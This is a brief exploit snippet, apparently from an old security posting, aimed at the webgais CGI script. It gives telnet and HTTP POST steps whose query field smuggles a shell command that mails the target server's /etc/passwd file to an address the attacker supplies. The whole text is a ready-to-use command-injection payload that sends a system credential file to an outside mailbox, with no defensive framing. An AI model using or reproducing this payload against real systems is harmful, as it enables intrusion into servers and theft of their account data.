Exploit:

 telnet target.machine.com 80
  POST /cgi-bin/webgais HTTP/1.0
  Content-length: 85 (replace 85 with length of the "exploit" line)

query=';mail+your_addy\@your_isp.com< /etc/passwd;echo'&output=subject&domain=paragraph